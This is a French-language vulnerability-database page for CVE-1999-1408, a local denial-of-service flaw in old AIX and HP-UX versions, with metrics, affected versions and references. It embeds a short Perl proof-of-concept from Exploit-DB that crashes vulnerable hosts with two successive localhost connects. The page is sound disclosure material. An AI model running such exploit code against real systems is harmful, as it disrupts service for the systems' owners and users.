CVE-1999-1408 : Détail

CVE-1999-1408

0.04%V3
Local
2001-09-12
02h00 +00:00
2024-08-01
17h11 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Vulnerability in AIX 4.1.4 and HP-UX 10.01 and 9.05 allows local users to cause a denial of service (crash) by using a socket to connect to a port on the localhost, calling shutdown to clear the socket, then using the same socket to connect to a different port on localhost.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19278

Date de publication : 1997-03-04 23h00 +00:00
Auteur : Cahya Wirawan
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/352/info Certain versions of AIX and HP/UX contained a bug in the way the OS handled the connect system call. The connect call is used to initiate a connection on a socket. Because of the flaw in the handling code under AIX certain versions will reboot when given two connects, one to a fixed port (a number of different ports were found to trigger this behaviour) and then another random port connection immediately thereafter. #!/usr/local/bin/perl5 use Socket; socket (SOCK,AF_INET,SOCK_STREAM,0); $iaddr = inet_aton('localhost'); $paddr = sockaddr_in('23',$iaddr); connect SOCK,$paddr; shutdown SOCK,2; $paddr = sockaddr_in('24',$iaddr); connect SOCK,$paddr;

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 9.05

Hp>>Hp-ux >> Version 10.01

Hp>>Hp-ux >> Version 10.20

Ibm>>Aix >> Version 4.1

Ibm>>Aix >> Version 4.1.1

Ibm>>Aix >> Version 4.1.2

Ibm>>Aix >> Version 4.1.3

Ibm>>Aix >> Version 4.1.4

Ibm>>Aix >> Version 4.1.5

Références

http://www.securityfocus.com/bid/352
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=bugtraq&m=87602167420641&w=2
Tags : mailing-list, x_refsource_BUGTRAQ